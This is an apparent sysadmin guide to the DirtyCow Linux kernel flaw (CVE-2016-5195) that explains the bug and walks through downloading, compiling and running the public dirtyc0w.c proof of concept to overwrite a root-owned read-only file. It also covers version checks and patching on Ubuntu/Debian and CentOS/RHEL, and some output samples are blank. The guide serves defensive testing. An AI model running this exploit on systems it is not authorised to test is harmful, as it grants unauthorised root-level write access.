DirtyCow vulnerability CVE-2016-5195 , How To FIX Ubuntu/Debian & REDHAT/CentOS

What is DirtyCow vulnerability ?

A vulnerability has been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.This race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.This could be abused by an attacker to modify existing “setuid” files with instructions to elevate privileges. An exploit using this technique has been found in the wild.

When was it found out ?

The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.

Who found this vulnerability?

Phil Oester

How to get the POC and Check ?

You can get the PoC from :

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

You can check it using the following steps :

Run it as follows. First be root:

# useradd dirtycow
# cd /home/dirtycow
# echo "No privileges to edit this file" > test.txt
# cat test.txt No privileges to edit this file
# chmod 0404 test.txt
# ls -al test.txt -r-----r-- 1 root root 45 Oct 21 00:43 test.txt

Run it as normal user:

$ su - dirtycow
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w test.txt TESTDIRTYCOW
mmap 7fc46bb9a000
madvise 0
procselfmem 1000000000

Check the output of file “test.txt” , You can see that the file was modified:

$ cat test.txt
TESTDIRTYCOWs to edit this file

How to Check this whether your system is affected by this vulnerability ?
In Ubuntu/Debian

To find out if your server is affected, check your kernel version.

# uname -rv

You’ll see output like this:

Output

If your version is earlier than the following, you are affected:

In CentOS/RHEL

If you’re on CentOS, you can use this script provided by RedHat to test your server’s vulnerability. To do so, first download the script.

# wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh

Then run it with bash.

# bash rh-cve-2016-5195_1.sh

If you’re vulnerable, you’ll see output like this:

Output

How can this be fixed?

1. Ubuntu/Debian

Ubuntu/Debian users are lucky , They can simply update their system using following commands and reboot server.

Update packages using apt-get.

# sudo apt-get update && sudo apt-get dist-upgrade

Reboot your server to apply the changes.

# sudo reboot

2. CentOS/RHEL

CentOS/RHEL has still not released the security patch for Dirty Cow vulnerability. Once the patch is released, update the OS with this security patch. This can be done using “yum update” , reboot the server after update to load the patched kernel.You can track updates from https://access.redhat.com/security/vulnerabilities/2706661

How to check current booted kernel is patched ?

# rpm -q --changelog kernel-`uname -r` | grep CVE-2016-5195

If the above output is empty , then you have to patch your kernel immediately.

Redhat has released patches, you can apply patches by updating kernel packages using yum:

# yum update

Reboot your server to apply the changes.

# shutdown -r now

How can we know which distributions are affected by this vulnerability ?

This vulnerability is affected in most linux distribution , Some of them are as follows :